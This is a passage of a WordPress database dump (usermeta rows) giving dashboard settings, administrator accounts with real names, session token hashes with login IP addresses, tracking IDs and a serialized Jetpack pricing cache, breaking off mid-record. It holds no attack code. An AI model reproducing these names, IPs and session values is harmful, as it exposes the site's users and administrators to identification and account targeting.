columnshidden','a:3:{i:0;s:0:\"\";i:1;s:15:\"rank_math_title\";i:2;s:21:\"rank_math_description\";}'),(31,1,'manageedit-elementor-hfcolumnshidden_default','1'),(32,1,'last_update','1573287150'),(33,1,'managenav-menuscolumnshidden','a:2:{i:0;s:3:\"xfn\";i:1;s:11:\"description\";}'),(34,1,'metaboxhidden_nav-menus','a:2:{i:0;s:12:\"add-post_tag\";i:1;s:15:\"add-post_format\";}'),(35,1,'nav_menu_recently_edited','2'),(36,1,'elementor_introduction','a:2:{s:10:\"rightClick\";b:1;s:7:\"flexbox\";b:1;}'),(39,1,'show_per_page','25'),(40,1,'orderby',''),(41,1,'manageedit-related_topiccolumnshidden','a:3:{i:0;s:0:\"\";i:1;s:15:\"rank_math_title\";i:2;s:21:\"rank_math_description\";}'),(42,1,'manageedit-related_topiccolumnshidden_default','1'),(43,1,'manageedit-epa_resourcecolumnshidden','a:3:{i:0;s:0:\"\";i:1;s:15:\"rank_math_title\";i:2;s:21:\"rank_math_description\";}'),(44,1,'manageedit-epa_resourcecolumnshidden_default','1'),(45,1,'closedpostboxes_epa_resource','a:3:{i:0;s:17:\"rank_math_metabox\";i:1;s:43:\"cmb-group-rank_math_snippet_book_editions-0\";i:2;s:49:\"cmb-group-rank_math_snippet_recipe_instructions-0\";}'),(46,1,'metaboxhidden_epa_resource','a:3:{i:0;s:43:\"cmb-group-rank_math_snippet_book_editions-0\";i:1;s:49:\"cmb-group-rank_math_snippet_recipe_instructions-0\";i:2;s:7:\"slugdiv\";}'),(48,1,'closedpostboxes_jet-smart-filters','a:0:{}'),(49,1,'metaboxhidden_jet-smart-filters','a:1:{i:0;s:7:\"slugdiv\";}'),(78,1,'elementor_admin_notices','a:1:{s:16:\"rate_us_feedback\";s:4:\"true\";}'),(108,1,'wp_tablepress_user_options','{\"user_options_db_version\":38,\"admin_menu_parent_page\":\"middle\",\"message_first_visit\":true}'),(109,1,'managetablepress_listcolumnshidden','a:1:{i:0;s:22:\"table_last_modified_by\";}'),(110,1,'closedpostboxes_institution','a:2:{i:0;s:12:\"revisionsdiv\";i:1;s:11:\"postexcerpt\";}'),(111,1,'metaboxhidden_institution','a:1:{i:0;s:7:\"slugdiv\";}'),(118,1,'wp__ca_cas_tour','1573736365'),(128,1,'closedpostboxes_usp_form','a:0:{}'),(129,1,'metaboxhidden_usp_form','a:1:{i:0;s:7:\"slugdiv\";}'),(144,1,'jetpack_tracks_anon_id','jetpack:tOQnyqaBemEygrjcsoAtb2Y3'),(145,1,'jetpack_tracks_wpcom_id','175279538'),(146,1,'meta-box-order_dashboard','a:4:{s:6:\"normal\";s:57:\"jetpack_summary_widget,e-dashboard-overview,pvc_dashboard\";s:4:\"side\";s:145:\"dashboard_quick_press,usp_pro_dashboard_widget_draft_posts,dashboard_right_now,dashboard_activity,wpp_trending_dashboard_widget,dashboard_primary\";s:7:\"column3\";s:0:\"\";s:7:\"column4\";s:0:\"\";}'),(584,38,'nickname','ujayvah'),(585,38,'first_name','Ujay'),(586,38,'last_name','Vah'),(587,38,'description',''),(588,38,'rich_editing','true'),(589,38,'syntax_highlighting','true'),(590,38,'comment_shortcuts','false'),(591,38,'admin_color','ectoplasm'),(592,38,'use_ssl','0'),(593,38,'show_admin_bar_front','false'),(594,38,'locale',''),(595,38,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(596,38,'wp_user_level','10'),(597,38,'dismissed_wp_pointers',''),(598,38,'default_password_nag',''),(608,1,'wp__ca_cas_review','1'),(613,39,'nickname','Tiger Love'),(614,39,'first_name','Kaman'),(615,39,'last_name','Weah'),(616,39,'description',''),(617,39,'rich_editing','true'),(618,39,'syntax_highlighting','true'),(619,39,'comment_shortcuts','false'),(620,39,'admin_color','fresh'),(621,39,'use_ssl','0'),(622,39,'show_admin_bar_front','true'),(623,39,'locale',''),(624,39,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(625,39,'wp_user_level','0'),(626,39,'dismissed_wp_pointers',''),(627,39,'session_tokens','a:1:{s:64:\"cad1d4b14d8f2a5410132db6849a3faf51071ee0706346a77b122763e3834089\";a:4:{s:10:\"expiration\";i:1716994070;s:2:\"ip\";s:14:\"169.155.226.41\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36\";s:5:\"login\";i:1716821270;}}'),(630,1,'closedpostboxes_post','a:1:{i:0;s:20:\"cas-content-sidebars\";}'),(631,1,'metaboxhidden_post','a:0:{}'),(632,1,'closedpostboxes_related_topic','a:2:{i:0;s:20:\"cas-content-sidebars\";i:1;s:12:\"postimagediv\";}'),(633,1,'metaboxhidden_related_topic','a:1:{i:0;s:7:\"slugdiv\";}'),(634,1,'closedpostboxes_document','a:1:{i:0;s:20:\"cas-content-sidebars\";}'),(635,1,'metaboxhidden_document','a:1:{i:0;s:7:\"slugdiv\";}'),(662,38,'wp_dashboard_quick_press_last_post_id','5934'),(663,38,'community-events-location','a:1:{s:2:\"ip\";s:13:\"143.105.145.0\";}'),(664,38,'wp_user-settings','libraryContent=browse&urlbutton=post&editor=tinymce&advImgDetails=hide&hidetb=1&resource_tag_tab=pop'),(665,38,'wp_user-settings-time','1773750140'),(666,38,'show_per_page','25'),(667,38,'orderby',''),(673,38,'closedpostboxes_institution','a:1:{i:0;s:12:\"revisionsdiv\";}'),(674,38,'metaboxhidden_institution','a:1:{i:0;s:7:\"slugdiv\";}'),(675,38,'nav_menu_recently_edited','133'),(676,38,'managenav-menuscolumnshidden','a:3:{i:0;s:11:\"css-classes\";i:1;s:3:\"xfn\";i:2;s:11:\"description\";}'),(677,38,'metaboxhidden_nav-menus','a:14:{i:0;s:22:\"add-post-type-usp_form\";i:1;s:22:\"add-post-type-document\";i:2;s:27:\"add-post-type-ekms_bulletin\";i:3;s:25:\"add-post-type-institution\";i:4;s:30:\"add-post-type-knowledge_broker\";i:5;s:26:\"add-post-type-mea_resource\";i:6;s:30:\"add-post-type-project_resource\";i:7;s:27:\"add-post-type-related_topic\";i:8;s:12:\"add-post_tag\";i:9;s:15:\"add-post_format\";i:10;s:25:\"add-institutions_category\";i:11;s:21:\"add-resource_category\";i:12;s:16:\"add-resource_tag\";i:13;s:17:\"add-resource_type\";}'),(678,38,'closedpostboxes_ekms_bulletin','a:0:{}'),(679,38,'metaboxhidden_ekms_bulletin','a:1:{i:0;s:7:\"slugdiv\";}'),(681,38,'elementor_introduction','a:3:{s:10:\"rightClick\";b:1;s:19:\"colorPickerDropping\";b:1;s:7:\"exit_to\";b:1;}'),(715,42,'nickname','esamuels'),(716,42,'first_name','Elvina'),(717,42,'last_name','Samuels'),(718,42,'description',''),(719,42,'rich_editing','true'),(720,42,'syntax_highlighting','true'),(721,42,'comment_shortcuts','false'),(722,42,'admin_color','fresh'),(723,42,'use_ssl','0'),(724,42,'show_admin_bar_front','true'),(725,42,'locale',''),(726,42,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(727,42,'wp_user_level','10'),(728,42,'dismissed_wp_pointers','theme_editor_notice'),(730,42,'wp_dashboard_quick_press_last_post_id','5447'),(731,42,'community-events-location','a:1:{s:2:\"ip\";s:13:\"143.105.145.0\";}'),(732,42,'wp_user-settings','libraryContent=browse&ampeditor=tinymce&amphidetb=1&editor=tinymce'),(733,42,'wp_user-settings-time','1670425223'),(734,38,'closedpostboxes_dashboard','a:0:{}'),(735,38,'metaboxhidden_dashboard','a:5:{i:0;s:20:\"e-dashboard-overview\";i:1;s:19:\"dashboard_right_now\";i:2;s:32:\"e-dashboard-widget-admin-top-bar\";i:3;s:21:\"dashboard_quick_press\";i:4;s:17:\"dashboard_primary\";}'),(736,38,'show_welcome_panel','0'),(737,38,'elementor_admin_notices','a:2:{s:16:\"rate_us_feedback\";s:4:\"true\";s:20:\"experiment_promotion\";s:4:\"true\";}'),(739,42,'elementor_introduction','a:3:{s:19:\"colorPickerDropping\";b:1;s:10:\"rightClick\";b:1;s:7:\"exit_to\";b:1;}'),(741,42,'nav_menu_recently_edited','2'),(742,42,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(743,42,'metaboxhidden_nav-menus','a:16:{i:0;s:27:\"add-post-type-zoom-meetings\";i:1;s:22:\"add-post-type-usp_form\";i:2;s:22:\"add-post-type-document\";i:3;s:27:\"add-post-type-ekms_bulletin\";i:4;s:25:\"add-post-type-institution\";i:5;s:30:\"add-post-type-knowledge_broker\";i:6;s:26:\"add-post-type-mea_resource\";i:7;s:30:\"add-post-type-project_resource\";i:8;s:27:\"add-post-type-related_topic\";i:9;s:12:\"add-post_tag\";i:10;s:15:\"add-post_format\";i:11;s:16:\"add-zoom-meeting\";i:12;s:25:\"add-institutions_category\";i:13;s:21:\"add-resource_category\";i:14;s:16:\"add-resource_tag\";i:15;s:17:\"add-resource_type\";}'),(744,42,'closedpostboxes_page','a:0:{}'),(745,42,'metaboxhidden_page','a:0:{}'),(749,1,'default_password_nag',''),(753,39,'community-events-location','a:1:{s:2:\"ip\";s:13:\"169.155.226.0\";}'),(759,38,'dismissed_update_notice','1'),(760,38,'meta-box-order_dashboard','a:4:{s:6:\"normal\";s:163:\"jetpack_summary_widget,dashboard_php_nag,e-dashboard-overview,dashboard_right_now,dashboard_activity,wpp_trending_dashboard_widget,e-dashboard-widget-admin-top-bar\";s:4:\"side\";s:75:\"dashboard_quick_press,dashboard_primary,pvc_dashboard,dashboard_site_health\";s:7:\"column3\";s:0:\"\";s:7:\"column4\";s:0:\"\";}'),(761,38,'ecs_instalation','1629197434'),(762,38,'ecs_notification_verification','2026-06-18'),(763,38,'ele_custom_skin_notice_dismissed','true'),(764,38,'wp_media_library_mode','grid'),(765,38,'meta-box-order_jet-smart-filters','a:3:{s:4:\"side\";s:30:\"submitdiv,cas-content-sidebars\";s:6:\"normal\";s:85:\"filter-labels,filter-settings,filter-date-formats,query-settings,filter-notes,slugdiv\";s:8:\"advanced\";s:0:\"\";}'),(766,38,'screen_layout_jet-smart-filters','2'),(767,38,'pvc_dashboard','a:2:{s:10:\"post_types\";a:0:{}s:10:\"menu_items\";a:0:{}}'),(768,42,'ecs_instalation','1629225642'),(769,42,'ecs_notification_verification','2025-06-11'),(770,38,'jetpack_tracks_wpcom_id','210236609'),(772,1,'ecs_instalation','1629228545'),(773,1,'ecs_notification_verification','2026-02-14'),(774,42,'meta-box-order_institution','a:3:{s:4:\"side\";s:82:\"submitdiv,institutions_categorydiv,pageparentdiv,cas-content-sidebars,postimagediv\";s:6:\"normal\";s:54:\"postexcerpt,slugdiv,pods-meta-more-fields,revisionsdiv\";s:8:\"advanced\";s:0:\"\";}'),(775,42,'screen_layout_institution','2'),(776,42,'closedpostboxes_institution','a:1:{i:0;s:11:\"postexcerpt\";}'),(777,42,'metaboxhidden_institution','a:1:{i:0;s:7:\"slugdiv\";}'),(778,38,'closedpostboxes_jet-smart-filters','a:0:{}'),(779,38,'metaboxhidden_jet-smart-filters','a:2:{i:0;s:19:\"filter-date-formats\";i:1;s:7:\"slugdiv\";}'),(788,43,'nickname','webmaster'),(789,43,'first_name','Trokon'),(790,43,'last_name','Saykpa'),(791,43,'description',''),(792,43,'rich_editing','true'),(793,43,'syntax_highlighting','true'),(794,43,'comment_shortcuts','false'),(795,43,'admin_color','modern'),(796,43,'use_ssl','0'),(797,43,'show_admin_bar_front','true'),(798,43,'locale',''),(799,43,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(800,43,'wp_user_level','10'),(801,43,'dismissed_wp_pointers','theme_editor_notice'),(803,43,'ecs_instalation','1629299731'),(804,43,'ecs_notification_verification','2026-02-23'),(805,43,'wp_dashboard_quick_press_last_post_id','5796'),(806,43,'community-events-location','a:1:{s:2:\"ip\";s:13:\"143.105.145.0\";}'),(807,43,'show_per_page','25'),(808,43,'orderby',''),(809,43,'wp_user-settings','editor=tinymce&libraryContent=browse'),(810,43,'wp_user-settings-time','1632073970'),(811,43,'jetpack_tracks_anon_id','jetpack:mjKzFrpJDoduznTvpkJTK81C'),(812,42,'closedpostboxes_ekms_bulletin','a:0:{}'),(813,42,'metaboxhidden_ekms_bulletin','a:1:{i:0;s:7:\"slugdiv\";}'),(815,43,'nav_menu_recently_edited','2'),(816,43,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(817,43,'metaboxhidden_nav-menus','a:14:{i:0;s:28:\"add-post-type-e-landing-page\";i:1;s:22:\"add-post-type-document\";i:2;s:27:\"add-post-type-ekms_bulletin\";i:3;s:25:\"add-post-type-institution\";i:4;s:30:\"add-post-type-knowledge_broker\";i:5;s:26:\"add-post-type-mea_resource\";i:6;s:30:\"add-post-type-project_resource\";i:7;s:27:\"add-post-type-related_topic\";i:8;s:12:\"add-post_tag\";i:9;s:15:\"add-post_format\";i:10;s:25:\"add-institutions_category\";i:11;s:21:\"add-resource_category\";i:12;s:16:\"add-resource_tag\";i:13;s:17:\"add-resource_type\";}'),(818,42,'closedpostboxes_','a:1:{i:0;s:24:\"kava-extra-page-settings\";}'),(819,42,'metaboxhidden_','a:0:{}'),(822,43,'closedpostboxes_dashboard','a:6:{i:0;s:20:\"e-dashboard-overview\";i:1;s:13:\"pvc_dashboard\";i:2;s:21:\"dashboard_site_health\";i:3;s:19:\"dashboard_right_now\";i:4;s:21:\"dashboard_quick_press\";i:5;s:17:\"dashboard_primary\";}'),(823,43,'metaboxhidden_dashboard','a:5:{i:0;s:20:\"e-dashboard-overview\";i:1;s:19:\"dashboard_right_now\";i:2;s:18:\"dashboard_activity\";i:3;s:21:\"dashboard_quick_press\";i:4;s:17:\"dashboard_primary\";}'),(827,43,'show_welcome_panel','0'),(828,43,'meta-box-order_dashboard','a:4:{s:6:\"normal\";s:143:\"e-dashboard-overview,pvc_dashboard,dashboard_site_health,dashboard_php_nag,dashboard_right_now,dashboard_activity,wpp_trending_dashboard_widget\";s:4:\"side\";s:62:\"dashboard_quick_press,dashboard_primary,jetpack_summary_widget\";s:7:\"column3\";s:0:\"\";s:7:\"column4\";s:0:\"\";}'),(911,38,'meta-box-order_post','a:3:{s:6:\"normal\";s:54:\"kava-extra-post-type-settings,kava-extra-page-settings\";s:8:\"advanced\";s:0:\"\";s:4:\"side\";s:20:\"cas-content-sidebars\";}'),(830,43,'meta-box-order_institution','a:3:{s:4:\"side\";s:82:\"submitdiv,institutions_categorydiv,pageparentdiv,cas-content-sidebars,postimagediv\";s:6:\"normal\";s:41:\"slugdiv,pods-meta-more-fields,postexcerpt\";s:8:\"advanced\";s:0:\"\";}'),(831,43,'screen_layout_institution','2'),(832,43,'closedpostboxes_institution','a:1:{i:0;s:11:\"postexcerpt\";}'),(833,43,'metaboxhidden_institution','a:1:{i:0;s:7:\"slugdiv\";}'),(834,42,'wp__ca_cas_tour','1634556950'),(835,42,'meta-box-order_ekms_bulletin','a:3:{s:4:\"side\";s:44:\"submitdiv,pageparentdiv,cas-content-sidebars\";s:6:\"normal\";s:29:\"slugdiv,pods-meta-more-fields\";s:8:\"advanced\";s:0:\"\";}'),(836,42,'screen_layout_ekms_bulletin','2'),(839,42,'session_tokens','a:1:{s:64:\"cc03a9ee666f9cac2fcf29f6ae5725e81249aeb29ad9a6b6f930cd12b1649e10\";a:4:{s:10:\"expiration\";i:1750847961;s:2:\"ip\";s:15:\"143.105.145.119\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36\";s:5:\"login\";i:1749638361;}}'),(840,42,'jetpack_tracks_wpcom_id','157676901'),(841,42,'show_per_page','25'),(844,38,'my-jetpack-cache-date','1770860041'),(845,38,'my-jetpack-cache','O:8:\"stdClass\":118:{s:15:\"jetpack_premium\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2000;s:12:\"product_name\";s:15:\"Jetpack Premium\";s:12:\"product_slug\";s:15:\"jetpack_premium\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-premium\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$164.95\";s:21:\"combined_cost_display\";s:7:\"$164.95\";s:4:\"cost\";d:164.94999999999998863131622783839702606201171875;s:18:\"cost_smallest_unit\";i:16495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:6:\"$13.75\";}s:16:\"jetpack_business\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2001;s:12:\"product_name\";s:20:\"Jetpack Professional\";s:12:\"product_slug\";s:16:\"jetpack_business\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-business\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$399.95\";s:21:\"combined_cost_display\";s:7:\"$399.95\";s:4:\"cost\";d:399.94999999999998863131622783839702606201171875;s:18:\"cost_smallest_unit\";i:39995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:6:\"$33.33\";}s:12:\"jetpack_free\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2002;s:12:\"product_name\";s:12:\"Jetpack Free\";s:12:\"product_slug\";s:12:\"jetpack_free\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:12:\"jetpack-free\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.00\";s:21:\"combined_cost_display\";s:2:\"$0\";s:4:\"cost\";i:0;s:18:\"cost_smallest_unit\";i:0;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:8:\"one time\";s:22:\"product_term_localized\";s:8:\"one time\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:23:\"jetpack_premium_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2003;s:12:\"product_name\";s:15:\"Jetpack Premium\";s:12:\"product_slug\";s:23:\"jetpack_premium_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-premium\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_business_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2004;s:12:\"product_name\";s:20:\"Jetpack Professional\";s:12:\"product_slug\";s:24:\"jetpack_business_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-business\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$39.95\";s:21:\"combined_cost_display\";s:6:\"$39.95\";s:4:\"cost\";d:39.9500000000000028421709430404007434844970703125;s:18:\"cost_smallest_unit\";i:3995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:16:\"jetpack_personal\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2005;s:12:\"product_name\";s:16:\"Jetpack Personal\";s:12:\"product_slug\";s:16:\"jetpack_personal\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-personal\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$77.95\";s:21:\"combined_cost_display\";s:6:\"$77.95\";s:4:\"cost\";d:77.9500000000000028421709430404007434844970703125;s:18:\"cost_smallest_unit\";i:7795;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$6.50\";}s:24:\"jetpack_personal_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2006;s:12:\"product_name\";s:16:\"Jetpack Personal\";s:12:\"product_slug\";s:24:\"jetpack_personal_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-personal\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$6.95\";s:21:\"combined_cost_display\";s:5:\"$6.95\";s:4:\"cost\";d:6.95000000000000017763568394002504646778106689453125;s:18:\"cost_smallest_unit\";i:695;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:22:\"jetpack_security_daily\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2010;s:12:\"product_name\";s:22:\"Jetpack Security Daily\";s:12:\"product_slug\";s:22:\"jetpack_security_daily\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:22:\"jetpack-security-daily\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$299.00\";s:21:\"combined_cost_display\";s:4:\"$299\";s:4:\"cost\";i:299;s:18:\"cost_smallest_unit\";i:29900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";i:149;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$24.92\";}s:30:\"jetpack_security_daily_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2011;s:12:\"product_name\";s:22:\"Jetpack Security Daily\";s:12:\"product_slug\";s:30:\"jetpack_security_daily_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:22:\"jetpack-security-daily\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$24.95\";s:21:\"combined_cost_display\";s:6:\"$24.95\";s:4:\"cost\";d:24.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:25:\"jetpack_security_realtime\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2012;s:12:\"product_name\";s:26:\"Jetpack Security Real-time\";s:12:\"product_slug\";s:25:\"jetpack_security_realtime\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:25:\"jetpack-security-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$839.00\";s:21:\"combined_cost_display\";s:4:\"$839\";s:4:\"cost\";i:839;s:18:\"cost_smallest_unit\";i:83900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";i:419;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$69.92\";}s:33:\"jetpack_security_realtime_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2013;s:12:\"product_name\";s:26:\"Jetpack Security Real-time\";s:12:\"product_slug\";s:33:\"jetpack_security_realtime_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:25:\"jetpack-security-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$69.95\";s:21:\"combined_cost_display\";s:6:\"$69.95\";s:4:\"cost\";d:69.9500000000000028421709430404007434844970703125;s:18:\"cost_smallest_unit\";i:6995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:16:\"jetpack_complete\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2014;s:12:\"product_name\";s:16:\"Jetpack Complete\";s:12:\"product_slug\";s:16:\"jetpack_complete\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-complete\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$599.40\";s:21:\"combined_cost_display\";s:7:\"$599.40\";s:4:\"cost\";d:599.3999999999999772626324556767940521240234375;s:18:\"cost_smallest_unit\";i:59940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:299.3999999999999772626324556767940521240234375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$49.95\";}s:24:\"jetpack_complete_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2015;s:12:\"product_name\";s:16:\"Jetpack Complete\";s:12:\"product_slug\";s:24:\"jetpack_complete_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-complete\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$74.95\";s:21:\"combined_cost_display\";s:6:\"$74.95\";s:4:\"cost\";d:74.9500000000000028421709430404007434844970703125;s:18:\"cost_smallest_unit\";i:7495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:26:\"jetpack_security_t1_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2016;s:12:\"product_name\";s:23:\"Jetpack Security 